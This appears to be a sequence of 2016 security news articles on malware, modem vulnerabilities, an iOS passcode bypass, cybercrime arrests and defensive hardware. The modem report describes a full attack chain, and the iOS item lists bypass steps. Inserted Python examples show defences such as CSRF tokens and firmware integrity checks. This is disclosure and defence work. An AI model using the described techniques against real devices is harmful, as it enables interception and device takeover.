Before installing, it checks for the presence of security products and malware analysis tools, including Sophos, INCAInternet, DoctorWeb, Baidu, Comodo, TrustPortAntivirus, GData, AVG, BitDefender, VirusChaser, McAfee, Panda, Trend Micro, Kingsoft, Norton, Micropoint, Filseclab, AhnLab, JiangMin, Tencent, Avira, Kaspersky, Rising, and Qihoo 360.
In the first stage of the infection, the T9000 backdoor collects information about the target system and sends it to the C&C server; the control infrastructure then sends specific commands to the bot based on the characteristics of the infected machine.
The researchers at Palo Alto Networks have identified three main plugins in the T9000 backdoor:
tyeu.dat
vnkd.dat
qhnj.dat
tyeu.dat is the component that implements the Skype spying features. When it hooks into the Skype API, the victim is presented with the message “explorer.exe wants to use Skype.” This Skype module can record both audio and video conversations, spy on text chats and take regular screenshots of video calls.
The vnkd.dat component is loaded to steal files from the infected computer, while the third module, qhnj.dat, implements backdoor functionality to control the local file system (create, delete and move files, encrypt files and directories, and copy the user’s clipboard).
The experts at Palo Alto believe the backdoor was developed by skilled professionals, given the evasion techniques implemented in the malicious code.
“The author of this backdoor has gone to great lengths to avoid being detected and to evade the scrutiny of the malware analysis community. We hope that sharing the details of how this tool works as well as the indicators in the section below will help others defend themselves against attacks using this tool.”
Critical Vulnerabilities in 3G/4G Modems or how to build Big Brother
8.2.2016 Vulnerebility
This report is the continuation of "#root via SMS", research by the SCADA Strangelove team in 2014. That work was devoted to telecommunications equipment vulnerabilities, with modem flaws only partially covered. This document describes vulnerabilities found and exploited in eight popular 3G and 4G modems available in Russia and worldwide. The findings include Remote Code Execution (RCE) in web scripts, integrity attacks, Cross-Site Request Forgery (CSRF), and Cross-Site Scripting (XSS).
The research covers a full range of attacks against carrier customers using these types of modems — device identification, code injection, PC infection, SIM card cloning, data interception, determining subscriber location, getting access to user accounts on the operator's website, and APT attacks.
Equipment
We analyzed eight modems of the following vendors:
Huawei (two different modems and a router)
Gemtek (a modem and a router)
Quanta (two modems)
ZTE (one modem)
Not all the modems had vulnerabilities in their factory settings; some of them appeared after the firmware was customized by the service provider.
For convenience, let's call all the network equipment — both modems and routers — collectively, "modems".
Statistics on Vulnerable Modems
The data was gathered passively from SecurityLab.ru between 01/29/2015 and 02/05/2015 (one week). Our statistics lack information about Huawei modems, but it can easily be found at shodan.io:
Vulnerabilities Detected
All the modem models investigated had critical vulnerabilities leading to complete system compromise. Virtually all the vulnerabilities could be exploited remotely (see the "Modems" table). Description of the detected vulnerabilities ranked by severity:
1. RCE (five devices)
All the modem web servers are based on simple CGI scripts that do not properly filter their input (except for Huawei modems, and even then only after a few security updates released since the vulnerabilities were disclosed).
All the modems work with the file system — they need to send AT commands, read and write SMS messages, configure firewall rules, etc.
Almost no devices had CSRF protection, which allowed remote code execution by means of social engineering and remote requests through a malicious website. Some modems were also vulnerable to XSS attacks.
Combined, these three factors produce a disappointing result — more than 60% of the modems are vulnerable to Remote Code Execution. Updated firmware that fixes all the vulnerabilities found is available only for Huawei modems (there is a public description of the vulnerabilities). The other vulnerabilities are still zero-days.
2. Integrity Attacks (six devices)
Only three modems were protected against arbitrary firmware modifications. Two of them had the same integrity check algorithm (a SHA1 hash signed with an RSA key), and the third one used the RC4 stream cipher for firmware encryption.
All the cryptographic schemes proved to be vulnerable to attacks on integrity and confidentiality. In the former case, we can modify the firmware by injecting arbitrary code. In the latter case, given the weak implementation of the algorithm, we managed to extract the encryption key and determine the encryption algorithm, which also allows firmware modification.
The other three modems had no protection against integrity attacks, but local access to COM interfaces was required to update the firmware.
The remaining two modems could be updated only through the carrier's network via Firmware Over-The-Air (FOTA) technology.
3. CSRF (five devices)
CSRF attacks can be used for various purposes, but the primary ones here are remote upload of modified firmware and arbitrary code injection. Using a unique token for each request is an efficient protection against this type of attack.
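The per-request token defence mentioned above, shown as an added example of what a modem's web UI would need around its firmware-upload handler. This is not code from the report or from any vendor's firmware; the handler name, session identifiers, form field and five-minute lifetime are assumptions.

```python
"""Single-use, session-bound anti-CSRF tokens for a state-changing handler.
Added example; handler name, session ids, field names and TTL are assumptions."""
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 300  # assumed lifetime; long enough for a human to submit a form


class CsrfGuard:
    """Issues one token per rendered form and accepts each token exactly once."""

    def __init__(self, now=time.time):
        self._now = now                 # injectable clock, so expiry is testable
        self._tokens = {}               # token -> (session_id, expiry)

    def issue(self, session_id):
        """Mint an unguessable token bound to the caller's session."""
        token = secrets.token_urlsafe(32)
        self._tokens[token] = (session_id, self._now() + TOKEN_TTL_SECONDS)
        return token

    def consume(self, session_id, presented):
        """Return True only for a live, unexpired token of this very session.
        The token is removed before any check, so a replay can never succeed."""
        entry = self._tokens.pop(presented, None)
        if entry is None:
            return False
        bound_session, expiry = entry
        if self._now() > expiry:
            return False
        return hmac.compare_digest(bound_session, session_id)


def render_upload_form(guard, session_id):
    """Embed the token as a hidden field; a cross-site page cannot read it."""
    token = guard.issue(session_id)
    return (
        '<form method="POST" action="/firmware/upload" enctype="multipart/form-data">'
        f'<input type="hidden" name="csrf" value="{token}">'
        '<input type="file" name="image"><button>Upload</button></form>'
    )


def handle_firmware_upload(guard, session_id, form):
    """State-changing handler: the token check runs before anything else."""
    if not guard.consume(session_id, form.get("csrf", "")):
        return "rejected"
    # ... only here would the firmware image be validated and written ...
    return "accepted"
```

Because the token is popped from the store before it is checked, a second submission of the same form (the replay a CSRF page would attempt) fails even if the first one succeeded, and a token issued to one session is useless in another.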
4. XSS (four devices)
The scope of this attack is quite wide — from host infection to SMS interception. However, our research focuses mainly on its prime target — modified firmware upload bypassing AntiCSRF checks and the Same-Origin Policy.
Attack Vectors
1. Identification
First, you need to identify the modem for a successful attack. You could send all kinds of requests to exploit RCE or try to upload various updates to all the possible addresses, but that is inefficient and too noisy for the target user. The time to infection — from user detection to code injection, modification of modem settings, etc. — also matters in real (not simulated) conditions.
For this very reason, you need to identify the target device properly. To do that, you can use a simple set of image URLs, which reveal the model of the modem. This method helped us to identify all the investigated modems with 100% accuracy. An example of the code:
2. Code Injection
This stage is described in the previous section, points 1 and 2. The code can be injected either through RCE in web scripts or through uploading infected firmware. The first method, which is not that complicated, allowed us to penetrate five modems.
Let's describe the vectors of the second method in detail.
Two modems used the same algorithm to protect firmware integrity: a digital signature of the SHA1 hash sum with an asymmetric RSA key, implemented via the OpenSSL library. The verification was incorrect. After the firmware (an archive) was uploaded, the web server extracted two main files from it: one specifying the size of the verified data and one with the signed hash sum. Next, the verification script obtained a public key from the file system and called OpenSSL functions to decrypt the signature and compare the hash sums. If the hash sums matched, the update was installed. The firmware compression format had a quirk: additional files with the same names could be appended to the archive without changing its first bytes, and on extraction later files overwrote earlier ones. This allowed the firmware to be changed without affecting the integrity check.
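The two defects in that scheme, a signature that covers only a declared-length prefix and an extractor in which a later duplicate silently wins, are easiest to see side by side. The following is an added example and not code from the report or from any modem's firmware: it uses a toy length-prefixed archive format and an HMAC in place of the RSA-signed SHA1 (both assumptions, chosen so the example runs on the standard library), and contrasts the flawed verifier with one that signs the whole archive and refuses duplicate member names.

```python
"""Prefix-only vs whole-archive firmware integrity checks (constructed toy format).
Added example; the archive format, key and filenames are assumptions, and
HMAC-SHA256 stands in for the RSA signature described in the report."""
import hashlib
import hmac
import struct

DEMO_KEY = b"demo-signing-key-not-a-real-secret"   # constructed


def pack_archive(members):
    """Serialize [(name, data), ...] as (name_len, name, data_len, data) records."""
    out = bytearray()
    for name, data in members:
        name_b = name.encode()
        out += struct.pack(">H", len(name_b)) + name_b
        out += struct.pack(">I", len(data)) + data
    return bytes(out)


def parse_archive(blob):
    """Yield (name, data) records in file order without merging duplicates."""
    pos = 0
    while pos < len(blob):
        (nlen,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        name = blob[pos:pos + nlen].decode()
        pos += nlen
        (dlen,) = struct.unpack_from(">I", blob, pos)
        pos += 4
        data = blob[pos:pos + dlen]
        pos += dlen
        if len(data) != dlen:
            raise ValueError("truncated archive")
        yield name, data


def sign(data):
    return hmac.new(DEMO_KEY, data, hashlib.sha256).digest()


def build_signed_image(members):
    """Mimic the flawed scheme: the signature covers only the first `size` bytes."""
    body = pack_archive(members)
    return {"size": len(body), "sig": sign(body), "archive": body}


def flawed_extract(image):
    """Verify only the declared prefix, then extract with later-wins semantics."""
    prefix = image["archive"][:image["size"]]
    if not hmac.compare_digest(sign(prefix), image["sig"]):
        raise ValueError("signature mismatch")
    files = {}
    for name, data in parse_archive(image["archive"]):
        files[name] = data          # an appended duplicate silently overrides
    return files


def hardened_extract(image):
    """Sign every byte of the archive and reject duplicate member names."""
    if not hmac.compare_digest(sign(image["archive"]), image["sig"]):
        raise ValueError("signature mismatch")
    files = {}
    for name, data in parse_archive(image["archive"]):
        if name in files:
            raise ValueError(f"duplicate member: {name}")
        files[name] = data
    return files


def append_members(image, extra_members):
    """Append records after the signed region, leaving the prefix untouched."""
    return {**image, "archive": image["archive"] + pack_archive(extra_members)}
```

The hardened variant fails closed in both directions: bytes appended beyond the original length change the signed input, and an archive that was legitimately signed while already containing two entries of the same name is still refused, because the signature says nothing about which copy the extractor will keep.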
The firmware of the third modem was encrypted with the RC4 algorithm using a constant keystream. As three different firmware versions were available on the Internet, you could obtain several bytes of plain text wherever a file of the unencrypted firmware contained 0x00 bytes.
Then, we extracted the ISO image of the modem's virtual CDROM, which allowed us to decipher the first several kilobytes of each firmware image. They contained the encryption algorithm and the address of the encryption key. By XORing the two pieces of firmware, we obtained the plain text of the key itself.
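What makes the constant-keystream design above unsound is the textbook property of any stream cipher: XORing two ciphertexts produced under one keystream cancels the keystream and leaves the XOR of the plaintexts, so every byte the two firmware versions share shows up as a zero. The following added example (not code from the report) turns that into an audit check a firmware reviewer can run on two encrypted images, and also confirms the "known 0x00 bytes expose keystream" observation. The images, key and thresholds are constructed for the demo.

```python
"""Keystream-reuse audit for firmware images encrypted with a fixed RC4 keystream.
Added example with constructed images and key; thresholds are assumptions."""


def rc4_keystream(key, n):
    """Plain RC4 (KSA + PRGA); used here only to build the demo ciphertexts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def rc4_encrypt(key, plaintext):
    return xor_bytes(plaintext, rc4_keystream(key, len(plaintext)))


def keystream_reuse_score(ct1, ct2):
    """Fraction of positions where two ciphertexts are equal.
    Under one shared keystream this equals the fraction of equal plaintext
    bytes (high for two versions of the same firmware); under independent
    keystreams it sits near 1/256. A score well above that is the red flag."""
    diff = xor_bytes(ct1, ct2)
    return diff.count(0) / len(diff)


def recover_keystream_at_zeros(ciphertext, zero_positions):
    """Where the plaintext is known to be 0x00, the ciphertext byte *is* the
    keystream byte, which is why zero padding in one image leaks the others."""
    return {p: ciphertext[p] for p in zero_positions}


def make_demo_images():
    """Two constructed 'firmware versions' sharing a header and zero padding."""
    header = b"FWIMG v1.0 " + b"\x00" * 64          # 75 shared bytes
    v1 = header + bytes(range(256)) * 4
    v2 = header + bytes(reversed(range(256))) * 4   # body differs at every byte
    return v1, v2
```

On the constructed pair, the shared 75-byte header gives a score of about 0.068 under a reused keystream versus roughly 0.004 when each image is encrypted under its own key; real firmware versions share far more than a header, so the gap in practice is much larger.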
Dmitry Sklyarov, an experienced cryptanalyst and reverse engineer from Positive Technologies, helped us a lot to conduct attacks against cryptographic protocols.
You can use CSRF for remote upload and HTML5 functions for transferring multipart/form-data, or XSS if an application is protected against CSRF (Huawei modem). Only three Huawei modems had this kind of protection, which could be bypassed via XSS, though. In all other cases, an attacker could use the HTML5 code located on a special web page (you can download an example from http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html).
Gemtek modems required a special firmware update utility installed on the PC. In this case, the firmware was uploaded through the host's internet connection via HTTP, after which its integrity was verified against checksums downloaded from the server. We did not manage to test this scenario.
However, it’s no use hoping that a vendor that doesn't properly check firmware integrity during upload protects it well enough.
3. Data Interception
Now we can execute arbitrary code on the modem. Three things are needed: determine the modem’s location (you will see why later), and be able to intercept SMS messages and HTTP/HTTPS traffic.
The easiest way to determine location is to find the base station identifier (CellID). Then, with the operator’s MCC and MNC at hand, you can determine the victim’s approximate location using public databases such as opencellid.org. Another method is to use the modem’s Wi-Fi card to scan nearby networks and narrow down the victim’s location, since one base station may have quite broad coverage. We managed to obtain the CellID from six modems; Wi-Fi was available in two devices. For one of the modems we had to recompile and upload a new network card driver, because the existing driver allowed only Ad Hoc mode, which prevents scanning nearby APs.
We studied two types of modems: with and without SMS support. The first type also didn’t allow SMS reading through AT commands. The second type allowed SMS reading via XSS. The messages are usually stored in the file system, so it is not difficult to access them for reading, or to send SMS messages and USSD requests.
Traffic interception is more interesting. There are several ways to do it: changing the modem’s DNS server settings, or replacing the modem’s gateway with the Wi-Fi interface and connecting to a hacker’s access point (this is why the victim’s location matters). The first method is simpler: changing the settings is a piece of cake, as they are also stored in the file system. We managed to do that for all but one modem. We studied the second method only in theory — switching the network card from ad hoc to active mode, connecting to an access point, and changing the modem's routing.
Not only HTTP traffic can be intercepted. By injecting and executing VBS code on an HTML page, you can add your certificate to the Trusted Root Certification Authorities and successfully conduct MITM attacks:
4. SIM Card Cloning and 2G Traffic Interception
The attacks against SIM card applications were described in detail by Karsten Nohl and in the “#root via SMS” research. We still have to send binary SMS messages to SIM cards, as we failed to make modems send commands to SIM card applications via APDU.
It’s not that bad, though — by injecting arbitrary code into a modem, you can extend the attack scope by means of binary SMS messages. Firstly, you can now send these messages “to yourself” from the target SIM card via the AT interface by switching the modem to test mode and working with the COM port. This can be done in the background — the web interface stays available to the victim, who will hardly notice the mode change. Secondly, you need to exchange data with the COM port by injecting VBS code into the modem page and executing it with user rights with the help of social engineering.
Switching the modem to the test mode
The PowerShell script for sending a binary SMS message
Using FakeBTS is the next attack vector, and you also need to know the victim’s location for it. Having the victim’s exact location and IMSI at hand, we can use a fake base station nearby and wait until the subscriber connects to us, or we can force a base station (it is possible for five devices). If the operation is successful, we will be able to send binary SMS messages to the target SIM card without any restrictions from the operator.
5. PC Infection
If we penetrate a modem, we have very few attack vectors. However, infecting a PC connected to the modem provides us with many ways to steal and intercept the PC user's data.
You may have already heard of the main infection vector — bad USB. There are also some other methods involving social engineering:
Virtual CDROM. Almost all the modems have a virtual drive image that is enabled for driver installation. You need to replace the image and force its mounting.
VBS, drive-by-download. Code injection to an HTML page, or forced upload of executable files as updates or “diag utilities”.
Browser 0-days. As an example, we used Adobe Flash 0-day found in the archives of Hacking Team.
Vulnerable client software. One of the operators delivered vulnerable diagnostic software together with its modems, which allowed arbitrary code execution on Windows and OS X PCs. Credit: we'd like to give special thanks to Mikhail Firstov from Headlight Security for finding this vulnerability.
Random Code Execution in the client software of a modem
6. APT Attacks
After infecting the modem and host, you need to persist somehow — keep changes in the modem even after it is switched off and prevent further firmware updates. It would also be useful to detect and infect other vulnerable modems as soon as they are connected to the PC. Most of the devices can be infected right in the phone store during "checking before buying".
There was another attack we failed to carry out — accessing the modem from the operator's network. Most vulnerable web servers listen on *:80, so there is a chance that the modem's web server is reachable from the operator's network. Only a few modems restrict incoming connections from the telecom's network or bind the listener to 192.168.0.1:80.
7. Additional Information
We also studied getting access to a personal account by sending a USSD request and resetting password via an SMS message.
This vector was demonstrated during the "#root via SMS" presentation. The vulnerability was exploited through an XSS attack that could be conducted by sending an SMS message. However, an attacker can also do that in modems that allow SMS reading via RCE.
XSS exploitation results
Summary
All in all, we have a full infection cycle of devices and related PCs. Using the infected devices, we can determine location, intercept and send SMS messages and USSD requests, read HTTP and HTTPS traffic (by replacing SSL certificates), attack SIM cards via binary SMS messages, and intercept 2G traffic. Further infection can continue through the operator's networks, popular websites or equipment infected by worms (when connecting a new device).
What can we recommend to clients who constantly work with such devices? Huawei modems with the latest firmware updates are the best protected. Huawei is the only vendor that delivers the firmware itself (operators are only allowed to add some visual elements and enable or disable certain functions) and fixes the vulnerabilities found in its software.
Modems
Information Disclosure
Although 90 days have passed since the service providers were informed of the vulnerabilities, many flaws remain unfixed. A crucial point: the vulnerabilities found during the research are not always the fault of the modem vendors; they can be introduced by telecom operators during software customization.
How to thwart the passcode lock screen on iOS 8 and 9?
8.2.2016 Apple
A security expert discovered an authentication bypass vulnerability in iOS devices that allows the lock screen passcode to be bypassed.
The security researcher Benjamin Kunz Mejri from Vulnerability Laboratory has discovered an authentication bypass vulnerability in iPhones and iPads running iOS 8 and iOS 9 that can be exploited by attackers to bypass the lock screen passcode.
This threat is real: there is a video and documentation available online. It’s all pretty technical, but the upshot is that the vulnerability lets an attacker bypass the lock screen on handsets running iOS 8 and iOS 9.
It is important to highlight that the attacker needs physical access to an unlocked iOS device, so the threat is not considered critical.
“An application update loop that results in a pass code bypass vulnerability has been discovered in the official Apple iOS (iPhone5&6|iPad2) v8.x, v9.0, v9.1 & v9.2. The security vulnerability allows local attackers to bypass pass code lock protection of the apple iphone via an application update loop issue. The issue affects the device security when processing to request a local update by an installed mobile ios web-application.” states the technical description published by the vulnerability-lab.com.
The attacker can put the iOS device into an unlimited loop, resulting in a temporary deactivation of the passcode lock screen.
“Local attacker can trick the iOS device into a mode where a runtime issue with unlimited loop occurs. This finally results in a temporary deactivation of the pass code lock screen. By loading the loop with remote app interaction we were able to stably bypass the auth of an iphone after the reactivation via shutdown button. The settings of the device were permanently requesting the pass code lock on interaction. Normally the pass code lock is being activated during the shutdown button interaction. In case of the loop the request shuts the display down but does not activate the pass code lock, like demonstrated in the attached poc security video.”
The issue could be triggered by powering off the iOS device, upon reboot the passcode authentication feature remains disabled, allowing an attacker to access the device without providing the passcode.
iPhone 6 bypass passcode
The advisory describes the following attack scenario:
First fill up about some % of the free memory in the iOS device with random data.
Now, you open the app-store choose to update all applications (update all push button).
Switch fast via home button to the slide index and perform iOS update at the same time. Note: The interaction to switch needs to be performed very fast to successfully exploit. In the first load of the update you can still use the home button. Press it to go back to index.
Now, press the home button again to review the open runnings slides.
Switch to the left menu after the last slide which is new and perform to open siri in the same moment. Now the slide hangs and runs all time in a loop.
Turn off via power button the ipad or iphone ….
Reactivate via power button and like you can see the session still runs in the loop and can be requested without any pass code. Note: Normally the pass code becomes available after the power off button interaction to stand-by mode.
Successful reproduce of the local security vulnerability!
Kunz reported the vulnerability to the Apple Product Security Team in late 2015, but at the time of writing the issue was still present.
Are you an iOS user? You should be careful when leaving the mobile device unattended.
Dyre crackdown, the biggest effort to date by Russian authorities against cybercrime
8.2.2016 Crime
Russian authorities raided offices of a Russian film distribution and production company as part of an operation against the Dyre gang.
Russian law enforcement and intelligence agencies in November raided the offices of a Russian film distribution and production company as part of an operation against one of the world’s most notorious cybercrime rings.
The authorities were supported by the experts at Kaspersky Lab who confirmed the involvement and announced it would reveal details about the operation at its annual conference.
This is the biggest effort to date by Russian authorities against cybercrime.
Experts believe that the ring is responsible for the distribution of the infamous Dyre banking trojan, which caused overall losses of tens of millions of dollars.
The list of victims includes names like Bank of America Corp and JPMorgan Chase & Co.
According to Reuters, which published the news exclusively, the authorities have not commented on the operation, and the CEO of the film company refused to provide further information.
“A spokesman for the Russian Interior Ministry’s cybercrime unit said his department was not involved in the case. The FSB, Russia’s main intelligence service, said it had no immediate comment.
Nikolay Volchkov, the chief executive of the film company named 25th Floor, said he could not answer questions about the raid.” wrote the Reuters.
Reuters clarified that it has no evidence that Volchkov or the film company is directly involved in the criminal organization.
What is unusual is that criminal rings operating from Russia are rarely prosecuted by the government unless they target Russian organizations.
According to Heimdal Security, in November 2015 more than 80,000 machines were already infected with the Dyre Trojan across the world. The experts at Dell SecureWorks estimated that more than 400 financial institutions have fallen victim to the infamous trojan.
Dyre is usually downloaded by the Upatre trojan; it is a powerful piece of malware capable of performing man-in-the-middle attacks through browser injections and harvesting the victim’s credentials.
The experts believe that the operation of the Russian authorities has successfully beheaded the organization behind the Dyre Trojan.
“We have seen a disruption over the last few months that is definitely consistent with successful law enforcement action,” explained security expert John Miller from iSight Partners.
There is another mystery in the story: the film company was working on a production called Botnet, a film about a cybercrime ring with a story that has many similarities with the Dyre gang.
The company also hired the firm Group-IB to advise the Botnet director and writers on the finer points of cybercrime.
Group-IB CEO, Ilya Sachkov, said he met Volchkov at a security conference.
“He asked if we would be interested in consulting with a scriptwriter they would hire in the United States,” Sachkov said.
In November, Sachkov received a strange and urgent call from Volchkov, saying he needed to meet.
“He was afraid. His colour was totally white,” said Sachkov. “He knows there is an ongoing investigation about cybercrime.”
Reuse of login credentials put more than 20M Alibaba accounts at risk
8.2.2016 Hacking
The reuse of login credentials on Taobao exposed more than 20 million accounts on Alibaba’s websites to attacks.
According to the state media reports, hackers have targeted over 20 million active accounts on Alibaba Group’s Taobao e-commerce website using Alibaba’s own cloud computing service.
The Chinese giant detected the attack in “the first instance” and responded by requesting users to change their passwords.
According to a report published on a website managed by the Ministry of Public Security, hackers behind the attack obtained a database of 99 million usernames and passwords from a number of websites.
The hackers used Alibaba’s own cloud computing platform to try the stolen credentials against the Taobao platform.
The hackers discovered that 20.59 million of the 99 million usernames were shared among different websites, including the e-commerce platform of the Chinese giant.
20.59 million represents about five percent of annual active buyers on Chinese retail marketplaces.
A spokesman from Alibaba confirmed that hackers rented the cloud computing service to launch the attack, but highlighted that there are no security issues affecting the company’s platform.
“Alibaba’s system was never breached,” the spokesman declared.
The hackers started to test the stolen credentials in mid-October and were discovered in November, when experts at the Chinese company noticed the unauthorized accesses and reported the case to police.
According to the ministry website, Alibaba discovered and blocked the majority of login attempts.
The experts discovered that the compromised accounts were used in various fraudulent activities. The hackers used them to raise Taobao sellers’ rankings by placing fake orders, a mechanism known as ‘brushing’.
The incident once again highlights the importance of a proper security posture for Internet users: the bad habit of reusing the same login credentials across several web services is one of the main causes of account compromise following a breach.
Maru OS — Android ROM that Turns into Debian Linux When Connected to a PC
6.2.2016 OS
Good News for Linux Techno Freaks! Do you usually mess with your Android smartphone by trying out the continual ins and outs of various apps and custom ROMs?
Then this news would be a perfect pick for you!
What If, you can effectively carry a Linux computer in your pocket?
Introducing a new Android-based operating system named "Maru OS" that combines the mobility of a smartphone with the power of a desktop on a single device.
Maru OS allows you to turn your smartphone into a desktop when you plug it into a monitor with an HDMI cable.
Maru custom ROM includes two operating systems:
Android 5.1 Lollipop for mobile phones
Debian-Linux for desktop monitor
When you connect your phone (with Maru OS installed on it) via HDMI to a monitor, it will load Debian Linux automatically on your desktop screen in less than 5 seconds.
"Your phone runs independently of your desktop so you can take a call and work on your big screen at the same time," Maru OS official website explains.
Maru ships with zero bloatware (no pre-installed apps), which leaves lots of free space for your own apps and keeps your phone fast.
Advantages of Maru OS
Dual OS in phone
Multi-Tasking
Lightweight Distro Packages
Zero Bloatware, except Google Play
Run a web server from your pocket
You can set up a portable development environment
And the Best One:
If by chance your phone gets disconnected from your screen, Maru OS will preserve your desktop state in the background, helping you pick up right where you left off.
"Your hardware's capabilities are shared across your mobile device and desktop, so you don't have to context-switch around so much," reads the website.
This latest OS is still in beta and currently available only for Nexus 5 devices. We hope this limitation will disappear later on.
MIT Develops Hack-Proof RFID Chip — Here's How It Works
6.2.2016 Hacking
Do you know about RFID chips and how many you are carrying at this moment?
Today, RFID chips are built into all sorts of items, including your credit cards, travel swipe cards, library books, grocery store cards, security tags, implanted medical records, passports and even the access cards provided by companies.
But, What actually is an RFID chip?
A radio frequency identification (RFID) tag is a small electronic device consisting of a chip on which data can be encoded, and an antenna used to transmit that data. It is typically used for short-distance communication of information.
However, there is concern that these RFID chips could easily be hacked, and the information on them could easily be stolen. After all, attackers don't even require physical access to these chips in order to read data from them.
The good news is:
Researchers at MIT have developed a new way to prevent RFID chips from being hacked.
Although the information on an RFID chip is protected with a secret cryptographic key that could thwart a casual data thief, skilled RFID hackers have repeatedly used "side-channel attacks" to extract information from these chips.
Side Channel Attacks:
The 'side-channel attacks' are designed to extract the secret cryptographic key from a system by analyzing the pattern of memory utilization or fluctuations in power usage.
However, a side-channel attack leaks only a small amount of information per repetition of the cryptographic algorithm, so an attacker needs to run it many times to recover the complete secret key.
Power Glitch Attacks:
One way to prevent side-channel attacks is to rotate the secret key after each transaction with the help of a random-number generator, but a skilled attacker can overcome this with a so-called "power glitch attack."
Repeatedly cutting the RFID chip's power just before it changes the secret cryptographic key is known as a power glitch attack.
Using this method, an attacker can render the rotation strategy ineffective and run the same side-channel attack thousands of times against the same key, in order to collect enough leakage to recover it from the RFID chip.
Here's How MIT Hack-Proof RFID Chip Works:
The new RFID chip developed by MIT researchers and manufactured by Texas Instruments is designed to block power glitch attacks and is, the researchers claim, virtually impossible to hack by any current means.
The new hack-proof RFID chip can resist power-glitch attacks by having:
An on-board power supply that is "virtually impossible to cut."
Non-volatile memory cells that store computations the chip is working on, even if there's a power cut.
The interrupted computation then resumes once power is restored.
"If that computation was an update of the secret key, it would complete the update before responding to a query from the scanner," the researchers wrote in a press release. "Power-glitch attacks won't work."
To achieve this, the new chip takes advantage of materials called ferroelectric crystals, whose molecules are arranged in a lattice in which positive and negative charges naturally separate.
These ferroelectric crystals can operate as a capacitor for storing charge, producing computer memory that retains data even when powered off.
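To make the argument above concrete, here is an added toy simulation (not MIT's design or code) of a tag that rotates its key after every transaction. The first variant tracks the in-progress update only in RAM, so cutting power right after each response leaves the old key in use indefinitely; the second keeps the pending-update marker in non-volatile memory and finishes the update on power-up before answering, as the article describes. The SHA-256 key schedule, the challenge-response and the demo key are stand-ins, not the chip's real cryptography.

```python
import hashlib


def next_key(key: bytes) -> bytes:
    """Toy key schedule (stand-in for the chip's real key-update routine)."""
    return hashlib.sha256(b"rotate|" + key).digest()


def answer(key: bytes, challenge: bytes) -> bytes:
    """Toy challenge-response computed under the tag's current key."""
    return hashlib.sha256(key + b"|" + challenge).digest()


class VolatileTag:
    """Rotates its key after every response but tracks the in-progress
    update only in RAM, so a power cut before the update finishes
    silently abandons it and the old key stays in use."""

    def __init__(self, key: bytes) -> None:
        self.key = key               # stored in non-volatile memory
        self.update_pending = False  # RAM only: lost when power is cut
        self.keys_used = []          # demo bookkeeping, not tag state

    def power_on(self) -> None:
        self.update_pending = False  # RAM comes up cleared

    def respond(self, challenge: bytes) -> bytes:
        self.keys_used.append(self.key)
        resp = answer(self.key, challenge)
        self.update_pending = True   # key update begins here
        return resp

    def finish_pending_work(self) -> None:
        """Runs only if power stays on long enough after the response."""
        if self.update_pending:
            self.key = next_key(self.key)
            self.update_pending = False


class NonVolatileTag(VolatileTag):
    """Keeps the pending-update marker in non-volatile memory: on power-up
    the interrupted update is completed before any query is answered."""

    def power_on(self) -> None:
        self.finish_pending_work()   # the marker survived the power cut


def glitched_session(tag: VolatileTag, challenge: bytes, n: int) -> int:
    """Attacker model from the article: power-cycle the tag right after each
    response, before the rotation can finish. Returns how many distinct keys
    the tag actually used across the n queries."""
    for _ in range(n):
        tag.power_on()
        tag.respond(challenge)
        # power cut here: finish_pending_work() never gets to run
    return len(set(tag.keys_used))


def normal_session(tag: VolatileTag, challenge: bytes, n: int) -> int:
    """Power stays on: both designs rotate the key after every query."""
    tag.power_on()
    for _ in range(n):
        tag.respond(challenge)
        tag.finish_pending_work()
    return len(set(tag.keys_used))


if __name__ == "__main__":
    k0 = bytes(16)                 # constructed demo key
    c = b"reader-challenge"        # constructed demo challenge
    print("volatile, glitched:    ", glitched_session(VolatileTag(k0), c, 1000))
    print("non-volatile, glitched:", glitched_session(NonVolatileTag(k0), c, 1000))
    print("volatile, normal:      ", normal_session(VolatileTag(k0), c, 1000))
```

With the volatile design every glitched query runs under the same key (1 distinct key in 1000 queries), which is exactly the repetition a side-channel attacker needs; the non-volatile design yields a fresh key per query even under glitching.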
The research team claims that if this high-security RFID chip reaches mainstream adoption, it could help prevent contactless card details from being stolen, potentially preventing credit card fraud.
However, nothing is unhackable today, so calling something "hack-proof" or "virtually impossible to hack" makes little sense: attackers nowadays are so skilled that even devices designed with security as a priority aren't immune to compromise.
Still, new technologies like this RFID chip, which take the security of users to the next level, are always a good idea and are very much needed.
Researchers spotted a new OS X scareware campaign
6.2.2016 Apple
Experts at the SANS Technology Institute spotted an OS X scareware campaign that leverages fake Adobe Flash Player installers.
Johannes Ullrich, security expert at the SANS Technology Institute, spotted an OS X scareware campaign that leverages fake Adobe Flash Player installers to trick users into downloading malicious software. The expert discovered the malicious campaign while analyzing Facebook clickbait scams.
“They do not rely on a vulnerability in the operating system. Instead, the user is asked to willingly install them, by making them look like genuine Adobe Flash warnings (and we keep telling users to make sure Flash is up to date, so they are likely going to obey the warning and install the update).” states the blog post published by the SANS Technology Institute. “The “Installer” for the fake Flash update will install various scareware (I observed a couple different varieties when re-running the installer), and it actually installs an up to date genuine version of Flash as well.”
The attackers used a simple and effective trick to deceive victims: the attack starts with a popup window alerting users that their Flash Player software is outdated and instructing them to update it.
Ullrich suspects that the code used to display the popup is injected by an advertisement on the page visited by the victim. If users agree to install the bogus update, they receive a fake Flash Player installer.
The bogus installer is able to bypass Apple’s Gatekeeper security feature: it appears as a legitimate application and is signed with a valid Apple developer certificate issued to one Maksim Noskov.
“Antivirus coverage was pretty bad yesterday when I came across this (4 out of 51 on Virustotal). On a brand new OS X 10.11 install, the “Installer” appears to install a genuine copy of Adobe Flash in addition to Scareware that asks for money after informing you of various system problems.” continues the post.
The software installs a genuine copy of Flash Player and attempts to convince users to download applications apparently designed to fix problems on the victim’s machine.
These applications attempt to trick users into calling a “support” line in order to receive instructions for fixing the alleged problems. The security experts published a small video showing what happens when victims install the “update” on a clean OS X 10.11 system:
Critical Flaws Found in NETGEAR Network Management System
